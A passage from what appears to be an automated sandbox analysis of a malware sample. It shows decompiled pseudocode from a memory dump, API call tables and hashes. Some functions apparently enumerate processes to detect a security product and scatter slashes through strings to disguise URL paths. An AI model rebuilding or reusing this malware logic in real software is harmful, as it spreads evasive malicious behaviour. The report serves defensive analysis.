					E00A953BB(_t30);
				}
				_t12 =  *0xa9d294; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00A9A1D4() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E00A974A5(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0xa9d108( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E00A96ABB(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                                                                                                                                                                                                                0x00a96c83
                                                                                                                                                                                                                                0x00a96c8a
                                                                                                                                                                                                                                0x00a96c94
                                                                                                                                                                                                                                0x00a96c98
                                                                                                                                                                                                                                0x00a96c9e
                                                                                                                                                                                                                                0x00a96cad
                                                                                                                                                                                                                                0x00a96cb4
                                                                                                                                                                                                                                0x00a96cb8
                                                                                                                                                                                                                                0x00a96cca
                                                                                                                                                                                                                                0x00a96ccc
                                                                                                                                                                                                                                0x00a96ccc
                                                                                                                                                                                                                                0x00a96cd1
                                                                                                                                                                                                                                0x00a96cd8
                                                                                                                                                                                                                                0x00a96d2f
                                                                                                                                                                                                                                0x00a96d2f
                                                                                                                                                                                                                                0x00a96d35
                                                                                                                                                                                                                                0x00a96d37
                                                                                                                                                                                                                                0x00a96d37
                                                                                                                                                                                                                                0x00a96d41
                                                                                                                                                                                                                                0x00a96d45
                                                                                                                                                                                                                                0x00a96d57
                                                                                                                                                                                                                                0x00a96d57
                                                                                                                                                                                                                                0x00a96d5b
                                                                                                                                                                                                                                0x00a96d61
                                                                                                                                                                                                                                0x00a96d61
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a96cf1
                                                                                                                                                                                                                                0x00a96cf6
                                                                                                                                                                                                                                0x00a96cfe
                                                                                                                                                                                                                                0x00a96d02
                                                                                                                                                                                                                                0x00a96d06
                                                                                                                                                                                                                                0x00a96d06
                                                                                                                                                                                                                                0x00a96d13
                                                                                                                                                                                                                                0x00a96d17
                                                                                                                                                                                                                                0x00a96d1b
                                                                                                                                                                                                                                0x00a96d70
                                                                                                                                                                                                                                0x00a96d76
                                                                                                                                                                                                                                0x00a96d76
                                                                                                                                                                                                                                0x00a96d29
                                                                                                                                                                                                                                0x00a96d2d
                                                                                                                                                                                                                                0x00a96d64
                                                                                                                                                                                                                                0x00a96d66
                                                                                                                                                                                                                                0x00a96d69
                                                                                                                                                                                                                                0x00a96d69
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a96d66
                                                                                                                                                                                                                                0x00a96d2d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a96d17

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A96E66: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04FD9BB8,00000000,?,?,69B25F44,00000005,00A9D00C,?,?,00A9588F), ref: 00A96E9C
                                                                                                                                                                                                                                  • Part of subcall function 00A96E66: lstrcpy.KERNEL32(00000000,00000000), ref: 00A96EC0
                                                                                                                                                                                                                                  • Part of subcall function 00A96E66: lstrcat.KERNEL32(00000000,00000000), ref: 00A96EC8
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00A9D2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00A9521B,?,00000001,?), ref: 00A96CC3
                                                                                                                                                                                                                                  • Part of subcall function 00A953BB: RtlFreeHeap.NTDLL(00000000,00000000,00A912FA,00000000,?,?,00000000), ref: 00A953C7
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00004E20,00A9521B,00000000,00000000,?,00000000,?,00A9521B,?,00000001,?,?,?,?,00A9A0EC), ref: 00A96D23
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00A9521B,?,00000001,?), ref: 00A96D51
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00A9521B,?,00000001,?,?,?,?,00A9A0EC), ref: 00A96D69
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 73268831-0
                                                                                                                                                                                                                                • Opcode ID: fb6e92e83f25a658f1ca62ca78ff8cc76031959d9114c85eaed903e40497ead1
                                                                                                                                                                                                                                • Instruction ID: 8e9fee793c08eb4be4d96f848abf7a74f0fa929e2cb3ad097bffd893c905ee4e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb6e92e83f25a658f1ca62ca78ff8cc76031959d9114c85eaed903e40497ead1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86210532740F559BCF319BA88D84A6B77E9EF88B20F050626F965EB150DF30CC428750
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A9516C, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 40%
                                                                                                                                                                                                                                			E00A9516C(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00A95597(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E00A92C67(_t23);
						}
					}
					return _t38;
				}
				if(E00A99B32(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xa9d2e4, 1, 0,  *0xa9d384);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00A92D1C(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00A94847(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00A9704F(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00A96C82( &_v32, _t39);
					goto L13;
				}
			}












                                                                                                                                                                                                                                0x00a9516c
                                                                                                                                                                                                                                0x00a95179
                                                                                                                                                                                                                                0x00a9517f
                                                                                                                                                                                                                                0x00a95180
                                                                                                                                                                                                                                0x00a95181
                                                                                                                                                                                                                                0x00a95182
                                                                                                                                                                                                                                0x00a95183
                                                                                                                                                                                                                                0x00a95187
                                                                                                                                                                                                                                0x00a95193
                                                                                                                                                                                                                                0x00a95197
                                                                                                                                                                                                                                0x00a9521f
                                                                                                                                                                                                                                0x00a9521f
                                                                                                                                                                                                                                0x00a95222
                                                                                                                                                                                                                                0x00a95224
                                                                                                                                                                                                                                0x00a9522c
                                                                                                                                                                                                                                0x00a9522c
                                                                                                                                                                                                                                0x00a95232
                                                                                                                                                                                                                                0x00a95235
                                                                                                                                                                                                                                0x00a95235
                                                                                                                                                                                                                                0x00a95232
                                                                                                                                                                                                                                0x00a95240
                                                                                                                                                                                                                                0x00a95240
                                                                                                                                                                                                                                0x00a951aa
                                                                                                                                                                                                                                0x00a951ac
                                                                                                                                                                                                                                0x00a951ac
                                                                                                                                                                                                                                0x00a951c3
                                                                                                                                                                                                                                0x00a951c7
                                                                                                                                                                                                                                0x00a951ca
                                                                                                                                                                                                                                0x00a951d5
                                                                                                                                                                                                                                0x00a951dc
                                                                                                                                                                                                                                0x00a951dc
                                                                                                                                                                                                                                0x00a951e5
                                                                                                                                                                                                                                0x00a951e9
                                                                                                                                                                                                                                0x00a951f7
                                                                                                                                                                                                                                0x00a951eb
                                                                                                                                                                                                                                0x00a951eb
                                                                                                                                                                                                                                0x00a951ec
                                                                                                                                                                                                                                0x00a951ed
                                                                                                                                                                                                                                0x00a951ee
                                                                                                                                                                                                                                0x00a951ef
                                                                                                                                                                                                                                0x00a951f0
                                                                                                                                                                                                                                0x00a951f0
                                                                                                                                                                                                                                0x00a951fc
                                                                                                                                                                                                                                0x00a951ff
                                                                                                                                                                                                                                0x00a95203
                                                                                                                                                                                                                                0x00a95205
                                                                                                                                                                                                                                0x00a95205
                                                                                                                                                                                                                                0x00a9520c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9520e
                                                                                                                                                                                                                                0x00a9520e
                                                                                                                                                                                                                                0x00a9521b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9521b

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00A9D2E4,00000001,00000000,00000040,00000001,?,747DF710,00000000,747DF730,?,?,?,00A9A0EC,?,00000001,?), ref: 00A951BD
                                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,00A9A0EC,?,00000001,?,00000002,?,?,00A958BD,?), ref: 00A951CA
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8,?,?,?,00A9A0EC,?,00000001,?,00000002,?,?,00A958BD,?), ref: 00A951D5
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00A9A0EC,?,00000001,?,00000002,?,?,00A958BD,?), ref: 00A951DC
                                                                                                                                                                                                                                  • Part of subcall function 00A92D1C: WaitForSingleObject.KERNEL32(00000000,?,?,?,00A951FC,?,00A951FC,?,?,?,?,?,00A951FC,?), ref: 00A92DF6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2559942907-0
                                                                                                                                                                                                                                • Opcode ID: aa18a1aacdafcc066afd8164d4637d9bdc920ea3c0df661a882a6918d972b73e
                                                                                                                                                                                                                                • Instruction ID: 9212be30e8ab1285527550b34df89f648f221f196e1fcbcb67ca7236577c2105
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa18a1aacdafcc066afd8164d4637d9bdc920ea3c0df661a882a6918d972b73e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C216272F00619ABCF11BFF4C8869EE77F9EB48354F154526FA11A7100DB34AD458BA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A91A54, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                                                			E00A91A54(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00A95157(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                                                                                                                                                                                                0x00a91a60
                                                                                                                                                                                                                                0x00a91a64
                                                                                                                                                                                                                                0x00a91a65
                                                                                                                                                                                                                                0x00a91a66
                                                                                                                                                                                                                                0x00a91a68
                                                                                                                                                                                                                                0x00a91a6a
                                                                                                                                                                                                                                0x00a91a6d
                                                                                                                                                                                                                                0x00a91a72
                                                                                                                                                                                                                                0x00a91b09
                                                                                                                                                                                                                                0x00a91b10
                                                                                                                                                                                                                                0x00a91b10
                                                                                                                                                                                                                                0x00a91a7b
                                                                                                                                                                                                                                0x00a91a82
                                                                                                                                                                                                                                0x00a91a92
                                                                                                                                                                                                                                0x00a91a92
                                                                                                                                                                                                                                0x00a91a98
                                                                                                                                                                                                                                0x00a91a9a
                                                                                                                                                                                                                                0x00a91a9f
                                                                                                                                                                                                                                0x00a91aa8
                                                                                                                                                                                                                                0x00a91aae
                                                                                                                                                                                                                                0x00a91ab3
                                                                                                                                                                                                                                0x00a91abe
                                                                                                                                                                                                                                0x00a91ac2
                                                                                                                                                                                                                                0x00a91ac4
                                                                                                                                                                                                                                0x00a91ac5
                                                                                                                                                                                                                                0x00a91ace
                                                                                                                                                                                                                                0x00a91ad2
                                                                                                                                                                                                                                0x00a91ae3
                                                                                                                                                                                                                                0x00a91ad4
                                                                                                                                                                                                                                0x00a91ad9
                                                                                                                                                                                                                                0x00a91ade
                                                                                                                                                                                                                                0x00a91aed
                                                                                                                                                                                                                                0x00a91aed
                                                                                                                                                                                                                                0x00a91ac2
                                                                                                                                                                                                                                0x00a91af3
                                                                                                                                                                                                                                0x00a91af9
                                                                                                                                                                                                                                0x00a91af9
                                                                                                                                                                                                                                0x00a91b02
                                                                                                                                                                                                                                0x00a91b07
                                                                                                                                                                                                                                0x00a91b07
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1198164300-0
                                                                                                                                                                                                                                • Opcode ID: 47e6fa45b269bb9747892b75876d834baf651355a14a46326f1ae58857ba1d51
                                                                                                                                                                                                                                • Instruction ID: 128dacfd576d711e2f72820e57fdd526937b79279f9061adab625b34f145cc99
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47e6fa45b269bb9747892b75876d834baf651355a14a46326f1ae58857ba1d51
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0213C75A0160AEFCB11DFA8D988D9EBBF8FF48351B108169E905E7210EB70DE41CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A9698B, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                			E00A9698B(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xa9d270, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xa9d288; // 0xbdb0c00
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xa9d288 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                                                                                                                                                                                                0x00a96993
                                                                                                                                                                                                                                0x00a96996
                                                                                                                                                                                                                                0x00a9699c
                                                                                                                                                                                                                                0x00a969b4
                                                                                                                                                                                                                                0x00a969b6
                                                                                                                                                                                                                                0x00a969bb
                                                                                                                                                                                                                                0x00a969bd
                                                                                                                                                                                                                                0x00a969c0
                                                                                                                                                                                                                                0x00a969c2
                                                                                                                                                                                                                                0x00a969c5
                                                                                                                                                                                                                                0x00a969c7
                                                                                                                                                                                                                                0x00a969c7
                                                                                                                                                                                                                                0x00a969c9
                                                                                                                                                                                                                                0x00a969d4
                                                                                                                                                                                                                                0x00a969d9
                                                                                                                                                                                                                                0x00a969ea
                                                                                                                                                                                                                                0x00a969f2
                                                                                                                                                                                                                                0x00a969f7
                                                                                                                                                                                                                                0x00a969fa
                                                                                                                                                                                                                                0x00a969fd
                                                                                                                                                                                                                                0x00a969ff
                                                                                                                                                                                                                                0x00a96a02
                                                                                                                                                                                                                                0x00a96a05
                                                                                                                                                                                                                                0x00a96a05
                                                                                                                                                                                                                                0x00a96a08
                                                                                                                                                                                                                                0x00a96a13
                                                                                                                                                                                                                                0x00a96a18
                                                                                                                                                                                                                                0x00a96a22

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00A9233E,00000000,?,?,00A9A714,?,04FD95B0), ref: 00A96996
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 00A969AE
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00A9233E,00000000,?,?,00A9A714,?,04FD95B0), ref: 00A969F2
                                                                                                                                                                                                                                • memcpy.NTDLL(00000001,?,00000001), ref: 00A96A13
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1819133394-0
                                                                                                                                                                                                                                • Opcode ID: 15994a68511da42e16dd4b72e60b15a75852ef698e842633043eaf2fbbeeb85e
                                                                                                                                                                                                                                • Instruction ID: 7fe1b8bffe0db65196da2054802b36fc99e10c2c314eae392ea583277078785f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15994a68511da42e16dd4b72e60b15a75852ef698e842633043eaf2fbbeeb85e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A11C272B00214EFDB10CBA9DD85D9ABBFAEB843A0F15027AF50597250EA709E4587A0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A96ABB, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 64%
                                                                                                                                                                                                                                			E00A96ABB(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t28 = E00A910E9(_a4, _t26, __edi);
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0xa9d2e0; // 0x453a5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0xa9e4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0xa9e8f0; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E00A97020();
					_push( &_v64);
					if( *0xa9d0e4() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E00A97020();
				}
				return _t28;
			}














                                                                                                                                                                                                                                0x00a96abb
                                                                                                                                                                                                                                0x00a96ac2
                                                                                                                                                                                                                                0x00a96ad0
                                                                                                                                                                                                                                0x00a96ad4
                                                                                                                                                                                                                                0x00a96ade
                                                                                                                                                                                                                                0x00a96ae3
                                                                                                                                                                                                                                0x00a96ae8
                                                                                                                                                                                                                                0x00a96aed
                                                                                                                                                                                                                                0x00a96af7
                                                                                                                                                                                                                                0x00a96b01
                                                                                                                                                                                                                                0x00a96b01
                                                                                                                                                                                                                                0x00a96af9
                                                                                                                                                                                                                                0x00a96af9
                                                                                                                                                                                                                                0x00a96af9
                                                                                                                                                                                                                                0x00a96af9
                                                                                                                                                                                                                                0x00a96b07
                                                                                                                                                                                                                                0x00a96b0d
                                                                                                                                                                                                                                0x00a96b0e
                                                                                                                                                                                                                                0x00a96b11
                                                                                                                                                                                                                                0x00a96b14
                                                                                                                                                                                                                                0x00a96b17
                                                                                                                                                                                                                                0x00a96b1f
                                                                                                                                                                                                                                0x00a96b28
                                                                                                                                                                                                                                0x00a96b30
                                                                                                                                                                                                                                0x00a96b30
                                                                                                                                                                                                                                0x00a96b32
                                                                                                                                                                                                                                0x00a96b34
                                                                                                                                                                                                                                0x00a96b34
                                                                                                                                                                                                                                0x00a96b3e

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A910E9: SysAllocString.OLEAUT32(00000000), ref: 00A91143
                                                                                                                                                                                                                                  • Part of subcall function 00A910E9: SysAllocString.OLEAUT32(0070006F), ref: 00A91157
                                                                                                                                                                                                                                  • Part of subcall function 00A910E9: SysAllocString.OLEAUT32(00000000), ref: 00A91169
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A96ADE
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A96B2A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocString$ErrorLastmemset
                                                                                                                                                                                                                                • String ID: <$@MxtNxt
                                                                                                                                                                                                                                • API String ID: 3736384471-3662781078
                                                                                                                                                                                                                                • Opcode ID: d8619a0bffa0e4e2b499cd5a1559ae3980e82bbd69a5618c9e36b2d82c79f083
                                                                                                                                                                                                                                • Instruction ID: c629ac16d5a5e08a98495b09c0391335633c3193a57df294c22002f39e82d19f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8619a0bffa0e4e2b499cd5a1559ae3980e82bbd69a5618c9e36b2d82c79f083
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8901D771B00218ABDB10EFA5E885EDEBBF8AF08750F448066F904E7251EB7199458BA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A9A1D4, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                			E00A9A1D4() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xa9d2e0; // 0x453a5a8
						_t2 = _t9 + 0xa9ee3c; // 0x73617661
						_push( &_v264);
						if( *0xa9d110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                                                                                                                                                                                                0x00a9a1df
                                                                                                                                                                                                                                0x00a9a1e9
                                                                                                                                                                                                                                0x00a9a1ed
                                                                                                                                                                                                                                0x00a9a1f7
                                                                                                                                                                                                                                0x00a9a228
                                                                                                                                                                                                                                0x00a9a1fe
                                                                                                                                                                                                                                0x00a9a203
                                                                                                                                                                                                                                0x00a9a210
                                                                                                                                                                                                                                0x00a9a219
                                                                                                                                                                                                                                0x00a9a230
                                                                                                                                                                                                                                0x00a9a21b
                                                                                                                                                                                                                                0x00a9a223
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9a223
                                                                                                                                                                                                                                0x00a9a231
                                                                                                                                                                                                                                0x00a9a232
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9a232
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9a22c
                                                                                                                                                                                                                                0x00a9a238
                                                                                                                                                                                                                                0x00a9a23d

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A9A1E4
                                                                                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 00A9A1F7
                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 00A9A223
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A9A232
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
